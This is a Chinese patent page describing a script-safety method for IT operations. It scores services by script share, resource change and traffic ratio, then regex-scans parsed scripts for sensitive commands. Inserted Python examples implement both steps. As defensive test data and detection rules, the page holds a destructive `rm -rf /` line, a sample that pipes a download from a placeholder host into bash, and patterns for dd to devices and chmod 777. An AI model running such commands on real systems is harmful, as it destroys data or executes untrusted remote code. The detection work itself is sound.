CN115344868A - Automatic operation and maintenance script safety guarantee method - Google Patents
Automatic operation and maintenance script safety guarantee method
- Publication number
- CN115344868A (application CN202210956631.5A)
- Authority
- CN
- China
- Prior art keywords
- service
- script
- representing
- representing service
- calculating
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Computing Systems (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Monitoring And Testing Of Exchanges (AREA)
Abstract
The invention provides a safety guarantee method for automatic operation and maintenance scripts, comprising the following steps: (1) presetting rules; (2) appointing a script auditor to perform manual intervention: calculating the script proportion of each service, the change of system resources caused by each service and the ratio of uplink to downlink traffic of each service within time T, obtaining a service risk value for each service, determining the suspected dangerous scripts and notifying the script auditor to audit them; (3) parsing the scripts; (4) rule scanning; and (5) dynamic auditing. The beneficial effects of the invention are that the system is subjected to timed and quantified manual intervention according to its current operating condition, so that the safe operation of the operation and maintenance system is guaranteed and misjudgements caused by service changes are avoided. The invention requires little manual operation, has a small computational cost and accurate analysis, and thereby greatly reduces misjudgements and improves monitoring coverage and accuracy.
Description
Technical Field
The invention relates to the field of automated operation and maintenance, and in particular to a safety guarantee method for automatic operation and maintenance scripts.
Background
An IT system typically audits the script that is actually executed against the parameter configuration and a list of sensitive commands, so as to ensure that the script executes safely on the resource device. Most current methods decide as follows: (1) presetting rules: after the system is installed, an initialization script is called automatically to initialize the preset rules, which comprise the preset script sensitive commands and the parameter-value matching rules, and a script auditor may be adjusted and appointed as required; (2) script parsing: the script file is read line by line, each command line is parsed by the script parser and output, and rule scanning is triggered; (3) rule scanning: the parsed command lines are matched against the matching rules as regular expressions, and sensitive command lines are output and recorded; and (4) dynamic auditing: an auditor is notified and audits the sensitive command lines.
In practice, scripts that run automatically are more likely to produce attack behaviour against the system than scripts operated manually. While a script runs, system resources are continually reconfigured automatically, which in turn changes communication traffic, the types of scripts being run, and so on. Existing methods check a script by parsing it and matching rules, and do not consider the changes in system configuration, communication traffic and the like that service changes cause. Attacks, however, usually take place in an operation and maintenance system whose operation is otherwise highly regular; the prior art audits script data only by parsing and rule matching, and does not consider timed, quantified manual intervention in the operation and maintenance system. It therefore easily misjudges a change in system configuration, traffic volume and the like that is really due to a service change.
Disclosure of Invention
To address the problem that existing script safety guarantee methods for operation and maintenance systems only analyse the script data themselves and rely heavily on rule matching, the invention provides an automatic operation and maintenance script safety guarantee method that introduces a manually defined script risk assessment on top of the preset rules.
The object of the invention is achieved by the following technical means. An automatic operation and maintenance script safety guarantee method comprises the following steps:
(1) Presetting rules: after the system is installed, an initialization script is called automatically to initialize the preset rules, which comprise the preset script sensitive commands and the parameter-value matching rules, and a script auditor may be adjusted and appointed as required;
(2) Appointing a script auditor to perform manual intervention: counting the running condition of the system within time T before the current moment, calculating the script proportion of each service, the change of system resources caused by each service and the ratio of uplink to downlink traffic of each service within time T, obtaining the service risk value of each service, determining the suspected dangerous scripts and notifying the script auditor to audit them;
(3) Script parsing: forming a script file from the scripts not identified as suspected dangerous scripts; reading the script file line by line from top to bottom, parsing it with the script parser, outputting the parsed command lines, and triggering rule scanning;
(4) Rule scanning: scanning the parsed command lines one by one, matching each against the matching rule expressions as regular expressions, and outputting and recording the sensitive command lines;
(5) Dynamic auditing: checking whether the scan result contains a sensitive command line and, if so, notifying the script auditor to audit it.
The specific method comprises the following steps:
(2.1) observing the running condition of the system within the time T preceding the current moment;
(2.2) computing the script proportion $P_i$ of service $A_i$, where $N$ denotes the number of services, $A_i$ the service with index $i$, and $\mathrm{count}(A_i)$ the number of scripts called by service $A_i$ within time T;
(2.3) computing the change of system resources caused by service $A_i$; the index data of the system resources comprise the disk space occupancy rate, the CPU utilization rate, the memory utilization rate, the number of ports used, the number of startup items and the number of databases used;
(2.4) computing the ratio of uplink traffic to downlink traffic of service $A_i$ within time T;
(2.6) while the system runs, computing the service risk value of each service, setting every service whose risk value exceeds the threshold as a suspected dangerous service, and setting every script called by a suspected dangerous service as a suspected dangerous script.
Furthermore, in step (2.3) the specific method is as follows: the index data of the system resources of service $A_i$ within time T are collected, the difference between these index data and the index data measured in normal operation with no application running is calculated, and the difference is normalised to obtain the change of system resources caused by service $A_i$,
where $k_1+k_2+k_3+k_4+k_5+k_6=1$ and $k_1,\dots,k_6$ are proportionality coefficients. For each of the six indices, three quantities of service $A_i$ enter the calculation: its value in normal operation with no application running, its value measured within time T, and its maximum allowed value, namely for the disk space occupancy rate ($\mathit{disk}_i$ within T), the CPU utilization rate ($\mathit{CPU}_i$), the memory utilization rate ($\mathit{Mem}_i$), the number of ports used ($\mathit{Port}_i$), the number of startup items ($\mathit{Start}_i$) and the number of databases used ($\mathit{DB}_i$).
Furthermore, in step (2.4) the specific method is as follows:
$\mathit{out}_j$ denotes the length of the $j$-th uplink flow of service $A_i$, $\mathit{in}_j$ the length of its $j$-th downlink flow, and $m$ and $n$ the numbers of uplink and downlink flows of service $A_i$ within time T, respectively.
The beneficial effects of the invention are as follows: the system is subjected to timed and quantified manual intervention according to its current operating condition, which guarantees the safe operation of the operation and maintenance system and avoids misjudgements caused by service changes. The invention requires little manual operation, has a small computational cost and accurate analysis, and thereby greatly reduces misjudgements and improves monitoring coverage and accuracy.
Drawings
FIG. 1 is a schematic flow chart of the safety guarantee method for executing an automatic operation and maintenance script according to the invention;
FIG. 2 is a schematic flow chart of selecting suspected dangerous script files for manual intervention;
FIG. 3 is a schematic flow chart of script parsing;
FIG. 4 is a schematic flow chart of rule scanning.
Detailed Description
The invention is described in detail with reference to the following figures and examples.
As shown in FIG. 1, in the automatic operation and maintenance script safety guarantee method, rules are preset first during system initialization, and the method is then implemented by running four modules: the preset-rule and manual-intervention module, the script parsing module, the rule scanning module and the dynamic auditing module. Specifically: 1. the preset-rule and manual-intervention module obtains the suspected dangerous script files by calculating the service risk values; 2. the script parsing module reads and parses the script line by line from top to bottom through the script parser, outputs the parsed script, and then triggers rule scanning to perform rule matching on the parsed script; 3. the rule scanning module takes the parsed script lines, performs regular-expression matching according to the scanning rules, and outputs and stores the sensitive command lines; 4. the dynamic auditing module checks whether the scan result contains a sensitive command line, automatically notifies an auditor to audit it if so, and otherwise takes no action. In general, script files are executed in three ways: manual execution, scheduled execution and execution by a third-party call. The method comprises the following steps:
(1) Presetting rules: after the system is installed, the initialization script is called automatically to initialize the preset rules, which comprise the preset script sensitive commands and the parameter-value matching rules; both may be adjusted and appointed as required;
(2) Appointing a script auditor to perform manual intervention: suspected dangerous scripts are determined from three dimensions of the services the system runs, namely the proportion of running scripts of each service, the change of system resources caused by the service change, and the ratio of uplink to downlink traffic; finally a service risk value is calculated for each service, and when the value exceeds 0.7 the corresponding script files are set as suspected dangerous script files. The specific steps are as follows:
(2.1) observing the running condition of the system within the time T preceding the current moment;
(2.2) computing the script proportion $P_i$ of service $A_i$; specifically, the sequence of scripts used by the terminal of each service $A_i$ within time T is counted, where $N$ denotes the number of services, $A_i$ the service with index $i$, and $\mathrm{count}(A_i)$ the number of scripts called by service $A_i$ within time T;
(2.3) computing the change of system resources caused by service $A_i$; the index data of the system resources comprise the disk space occupancy rate, the CPU utilization rate, the memory utilization rate, the number of ports used, the number of startup items and the number of databases used;
specifically, the index data of the system resources of service $A_i$ within time T are collected, the difference between these index data and the index data measured in normal operation with no application running is calculated, and the difference is normalised to obtain the change of system resources caused by service $A_i$,
where $k_1+k_2+k_3+k_4+k_5+k_6=1$ and $k_1,\dots,k_6$ are proportionality coefficients, each preset to $1/6$. For each of the six indices, three quantities of service $A_i$ enter the calculation: its value in normal operation with no application running, its value measured within time T, and its maximum allowed value, namely for the disk space occupancy rate ($\mathit{disk}_i$ within T), the CPU utilization rate ($\mathit{CPU}_i$), the memory utilization rate ($\mathit{Mem}_i$), the number of ports used ($\mathit{Port}_i$), the number of startup items ($\mathit{Start}_i$) and the number of databases used ($\mathit{DB}_i$).
(2.4) computing the ratio of uplink traffic to downlink traffic of service $A_i$ within time T,
where $\mathit{out}_j$ denotes the length of the $j$-th uplink flow of service $A_i$, $\mathit{in}_j$ the length of its $j$-th downlink flow, and $m$ and $n$ the numbers of uplink and downlink flows of service $A_i$ within time T, respectively.
(2.6) while the system runs, computing the service risk value of each service, setting every service whose risk value exceeds the threshold (which may be preset to 0.7) as a suspected dangerous service, and setting every script called by a suspected dangerous service as a suspected dangerous script.
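The service-risk scoring of step (2), both as stated in the summary above (steps (2.1) to (2.6) and the definitions for (2.3) and (2.4)) and in this detailed description, worked through on constructed measurements. This is an added example and not the patent's own code; the page reproduces the patent's formulas only as images, so the way the three dimensions are computed and combined here is an assumption: $P_i$ as the share of all scripts called in T, the resource change as the weighted, clipped, normalised deviation from the idle baseline with every $k$ set to $1/6$, the traffic dimension as the uplink share $\sum out_j/(\sum out_j+\sum in_j)$ (the ratio $r$ mapped to $r/(1+r)$ so it stays in $[0,1]$), and the risk value as the mean of the three, flagged above 0.7. Service names, scripts and all numbers are constructed.

```python
"""Service risk scoring for step (2) (added example, not the patent's code).
Assumed formulas, because the page shows the patent's as images only:
  P_i       = count(A_i) / sum_j count(A_j)
  delta R_i = sum over the six indices of k_m * clip((x_i - x_base) / x_max, 0, 1),
              every k_m preset to 1/6
  F_i       = sum(out_j) / (sum(out_j) + sum(in_j))      (uplink share, in [0, 1])
  risk_i    = (P_i + delta R_i + F_i) / 3, suspected dangerous when > 0.7
"""
from dataclasses import dataclass
from typing import Dict, List

RESOURCE_KEYS = ("disk", "cpu", "mem", "port", "start", "db")
WEIGHTS = {key: 1.0 / 6.0 for key in RESOURCE_KEYS}   # k_1 .. k_6, sum to 1
RISK_THRESHOLD = 0.7


@dataclass
class ServiceWindow:
    """Everything observed for one service A_i over the window T."""
    name: str
    scripts: List[str]              # scripts the service called in T
    observed: Dict[str, float]      # index data measured during T
    baseline: Dict[str, float]      # index data with no application running
    max_allowed: Dict[str, float]   # maximum allowed value per index
    uplink: List[int]               # out_j: length of each uplink flow
    downlink: List[int]             # in_j: length of each downlink flow


def script_proportion(services: List[ServiceWindow]) -> Dict[str, float]:
    """Step (2.2): P_i, the share of all scripts called in T by service A_i."""
    total = sum(len(s.scripts) for s in services)
    return {s.name: len(s.scripts) / total if total else 0.0 for s in services}


def resource_change(s: ServiceWindow) -> float:
    """Step (2.3): weighted, normalised deviation from the idle baseline."""
    change = 0.0
    for key in RESOURCE_KEYS:
        delta = (s.observed[key] - s.baseline[key]) / s.max_allowed[key]
        change += WEIGHTS[key] * min(max(delta, 0.0), 1.0)  # clip to [0, 1]
    return change


def traffic_ratio(s: ServiceWindow) -> float:
    """Step (2.4): uplink share of the traffic in T (ratio r mapped to r/(1+r))."""
    out_total, in_total = sum(s.uplink), sum(s.downlink)
    if out_total + in_total == 0:
        return 0.0
    return out_total / (out_total + in_total)


def risk_values(services: List[ServiceWindow]) -> Dict[str, float]:
    """Step (2.6): one risk value per service."""
    proportions = script_proportion(services)
    return {s.name: (proportions[s.name] + resource_change(s) + traffic_ratio(s)) / 3
            for s in services}


def suspected_dangerous_scripts(services: List[ServiceWindow]) -> Dict[str, List[str]]:
    """Services above the threshold and the scripts they called, for the auditor."""
    risks = risk_values(services)
    return {s.name: list(s.scripts) for s in services if risks[s.name] > RISK_THRESHOLD}


def sample_services() -> List[ServiceWindow]:
    """Constructed measurements for three services over one window T."""
    idle = {"disk": 0.35, "cpu": 0.10, "mem": 0.20, "port": 4, "start": 2, "db": 0}
    limits = {"disk": 0.90, "cpu": 1.00, "mem": 1.00, "port": 100, "start": 20, "db": 5}
    return [
        ServiceWindow("web", ["deploy.sh", "rotate_logs.sh"],
                      {"disk": 0.40, "cpu": 0.30, "mem": 0.35, "port": 12, "start": 3, "db": 1},
                      idle, limits, uplink=[5_000, 7_000], downlink=[20_000, 30_000]),
        ServiceWindow("cron", ["healthcheck.sh", "tmp_clean.sh"],
                      {"disk": 0.36, "cpu": 0.12, "mem": 0.21, "port": 5, "start": 2, "db": 0},
                      idle, limits, uplink=[800], downlink=[1_200]),
        # Suddenly runs many scripts, saturates resources and sends far more
        # than it receives: the exfiltration-shaped outlier.
        ServiceWindow("sync", ["s%02d.sh" % n for n in range(12)],
                      {"disk": 0.85, "cpu": 0.95, "mem": 0.90, "port": 90, "start": 18, "db": 5},
                      idle, limits, uplink=[900_000, 800_000], downlink=[1_000, 2_000]),
    ]


if __name__ == "__main__":
    svcs = sample_services()
    for name, value in risk_values(svcs).items():
        print(f"{name:5s} risk={value:.3f}")
    print("suspected dangerous scripts:", suspected_dangerous_scripts(svcs))
```

Two points matter when deploying a score like this: the baseline must be measured with no application running (otherwise a service that is always busy never deviates), and the clip in resource_change keeps a single saturated index from dominating, so the threshold of 0.7 is only reached when several dimensions move together.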
(3) Script parsing: the scripts not identified as suspected dangerous scripts are formed into a script file (i.e. the collected scripts are stored in a file); the script file is read line by line from top to bottom, parsed by the script parser, and the parsed command lines are output, which triggers rule scanning;
FIG. 3 details the script parsing flow of the invention: when a script is executed, its content is first read line by line; next, each line is parsed by the script parser and a CmdLine record is output, e.g. for the script line `rm -rf ${path}` with the parameter path set to `/`, the output is CmdLine {"lineNum":1, "parsedCmdLine":"rm -rf /"}; finally rule scanning is triggered on the CmdLine.
(4) Rule scanning: as shown in FIG. 4, the parsed command lines are scanned one by one, each is matched against the matching rule expressions as regular expressions, and the sensitive command lines are output and recorded;
FIG. 4 details the rule scanning flow of the invention: when triggered, the parsed command line CmdLine is first read; next, the command-line matching rules are read and applied to CmdLine as regular expressions, and matching lines are output as sensitive command lines, e.g. CmdLine {"lineNum":1, "parsedCmdLine":"rm -rf /"} matched by cmdRegex `rm -rf \/` yields ResultLine {"lineNum":1, "parsedCmdLine":"rm -rf /"}; finally all sensitive command lines are stored and linked to their script file, as the basis on which dynamic auditing automatically notifies the auditor and the auditor audits the script.
(5) Dynamic auditing: the scan result is checked for sensitive command lines; if any exist, the script auditor is notified to audit them, otherwise no action is taken.
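Steps (3) to (5), as listed in the summary above and detailed here with the FIG. 3 and FIG. 4 examples, carried through end to end: parse a script line by line, expand parameter values, emit CmdLine records, run the sensitive-command rules over each parsed line, and decide whether the auditor must be notified. This is an added example, not the patent's code. Assumptions: parameters are written `${name}` or `$name`; the rule set is constructed for this example (the page shows only the shape of the `rm -rf /` rule); the sample script, its parameter values and the script name are constructed.

```python
"""Steps (3)-(5): script parsing, rule scanning and dynamic auditing
(added example, not the patent's code).  The rule set, the ${name} parameter
syntax and the sample script are assumptions constructed for this example.
"""
import json
import re
from typing import Dict, List

# Step (1): preset rules, each (rule id, regex applied to the *parsed* line).
SENSITIVE_RULES = [
    # rm with any flags whose first target is the filesystem root
    ("rm-root", re.compile(r"^\s*rm\b(?:\s+-\S+)*\s+[\"']?/[\"']?(?:\s|$)")),
    # download piped straight into a shell
    ("pipe-to-shell", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    # raw write to a block device
    ("dd-to-device", re.compile(r"^\s*dd\b.*\bof=/dev/")),
    # world-writable permissions
    ("chmod-777", re.compile(r"^\s*chmod\b.*\b[0-7]?777\b")),
]

PARAM_RE = re.compile(r"\$\{(\w+)\}|\$(\w+)")


def substitute(line: str, params: Dict[str, str]) -> str:
    """Expand ${name} / $name from the parameter configuration; unknown
    parameters are left untouched so the scanner still sees them."""
    def repl(match):
        name = match.group(1) or match.group(2)
        return params.get(name, match.group(0))
    return PARAM_RE.sub(repl, line)


def parse_script(text: str, params: Dict[str, str]) -> List[dict]:
    """Step (3): one CmdLine record per non-empty, non-comment line."""
    cmdlines = []
    for num, raw in enumerate(text.splitlines(), start=1):
        stripped = raw.strip()
        if not stripped or stripped.startswith("#"):
            continue
        cmdlines.append({"lineNum": num, "parsedCmdLine": substitute(stripped, params)})
    return cmdlines


def rule_scan(cmdlines: List[dict]) -> List[dict]:
    """Step (4): a ResultLine for every CmdLine that matches a rule."""
    results = []
    for cmd in cmdlines:
        for rule_id, regex in SENSITIVE_RULES:
            if regex.search(cmd["parsedCmdLine"]):
                results.append({**cmd, "cmdRegex": rule_id})
                break   # one hit is enough to send the line to audit
    return results


def dynamic_audit(script_name: str, results: List[dict]) -> str:
    """Step (5): notify the auditor only when the scan found something."""
    if not results:
        return f"{script_name}: no sensitive command line, no action"
    lines = ", ".join(str(r["lineNum"]) for r in results)
    return f"{script_name}: notify script auditor, sensitive lines {lines}"


# Constructed sample: the danger only appears after parameter substitution
# (path=/ turns `rm -rf ${path}` into `rm -rf /`).
SAMPLE_SCRIPT = """\
#!/usr/bin/env bash
set -e
echo "cleaning ${path}"
rm -rf ${path}
tar czf /backup/app.tgz /var/app
curl -s http://updates.example.invalid/post.sh | bash
chmod 644 /etc/app.conf
"""
SAMPLE_PARAMS = {"path": "/"}


def audit_script(text: str, params: Dict[str, str], name: str = "cleanup.sh"):
    """Run steps (3)-(5); returns (CmdLines, ResultLines, audit decision)."""
    cmdlines = parse_script(text, params)
    results = rule_scan(cmdlines)
    return cmdlines, results, dynamic_audit(name, results)


if __name__ == "__main__":
    cmdlines, results, decision = audit_script(SAMPLE_SCRIPT, SAMPLE_PARAMS)
    for r in results:
        print("ResultLine", json.dumps(r))
    print(decision)
```

The scan runs on the substituted text, which is what catches `rm -rf ${path}` when the configured value is `/`; the same line with `path=/tmp/x` produces no ResultLine. Regular-expression rules of this kind are easy to evade (an `eval`, a base64-decoded payload, or a variable set only at run time), which is why the step (2) behavioural score is kept as an independent path to the auditor.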
It should be understood that those skilled in the art may make equivalent replacements and modifications to the technical solutions and inventive concept of the present invention.
Claims (4)
1. An automatic operation and maintenance script safety guarantee method, characterised in that it comprises the following steps:
(1) Presetting rules: after the system is installed, an initialization script is called automatically to initialize the preset rules, which comprise the preset script sensitive commands and the parameter-value matching rules, and a script auditor may be adjusted and appointed as required;
(2) Appointing a script auditor to perform manual intervention: counting the running condition of the system within time T before the current moment, calculating the script proportion of each service, the change of system resources caused by each service and the ratio of uplink to downlink traffic of each service within time T, and obtaining the service risk value of each service, thereby determining the suspected dangerous scripts;
(3) Script parsing: forming a script file from the scripts not determined to be suspected dangerous scripts; reading the script file line by line from top to bottom, parsing it with the script parser, outputting the parsed command lines, and triggering rule scanning;
(4) Rule scanning: scanning the parsed command lines one by one, matching each against the matching rule expressions as regular expressions, and outputting and recording the sensitive command lines;
(5) Dynamic auditing: checking whether the scan result contains a sensitive command line and, if so, notifying the script auditor to audit it.
2. The automatic operation and maintenance script safety guarantee method of claim 1, characterised in that the specific method of step (2) is as follows:
(2.1) observing the running condition of the system within the time T preceding the current moment;
(2.2) computing the script proportion $P_i$ of service $A_i$, where $N$ denotes the number of services, $A_i$ the service with index $i$, and $\mathrm{count}(A_i)$ the number of scripts called by service $A_i$ within time T;
(2.3) computing the change of system resources caused by service $A_i$; the index data of the system resources comprise the disk space occupancy rate, the CPU utilization rate, the memory utilization rate, the number of ports used, the number of startup items and the number of databases used;
(2.4) computing the ratio of uplink traffic to downlink traffic of service $A_i$ within time T.
3. The automatic operation and maintenance script safety guarantee method of claim 2, characterised in that the specific method of step (2.3) is as follows: the index data of the system resources of service $A_i$ within time T are collected, the difference between these index data and the index data measured in normal operation with no application running is calculated, and the difference is normalised to obtain the change of system resources caused by service $A_i$,
where $k_1+k_2+k_3+k_4+k_5+k_6=1$ and $k_1,\dots,k_6$ are proportionality coefficients. For each of the six indices, three quantities of service $A_i$ enter the calculation: its value in normal operation with no application running, its value measured within time T, and its maximum allowed value, namely for the disk space occupancy rate ($\mathit{disk}_i$ within T), the CPU utilization rate ($\mathit{CPU}_i$), the memory utilization rate ($\mathit{Mem}_i$), the number of ports used ($\mathit{Port}_i$), the number of startup items ($\mathit{Start}_i$) and the number of databases used ($\mathit{DB}_i$).
4. The automatic operation and maintenance script safety guarantee method of claim 2, characterised in that the specific method of step (2.4) is as follows:
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202210956631.5A CN115344868A (en) | 2022-08-10 | 2022-08-10 | Automatic operation and maintenance script safety guarantee method |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202210956631.5A CN115344868A (en) | 2022-08-10 | 2022-08-10 | Automatic operation and maintenance script safety guarantee method |
Publications (1)
Publication Number | Publication Date |
---|---|
CN115344868A true CN115344868A (en) | 2022-11-15 |
Family
ID=83952498
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202210956631.5A Pending CN115344868A (en) | 2022-08-10 | 2022-08-10 | Automatic operation and maintenance script safety guarantee method |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN115344868A (en) |
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN115544524A (en) * | 2022-11-30 | 2022-12-30 | 北京广通优云科技股份有限公司 | IT system automation operation and maintenance script execution safety guarantee method for preventing data leakage |
Events: 2022-08-10, CN, application CN202210956631.5A (patent/CN115344868A/en), active, Pending
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | |
SE01 | Entry into force of request for substantive examination | |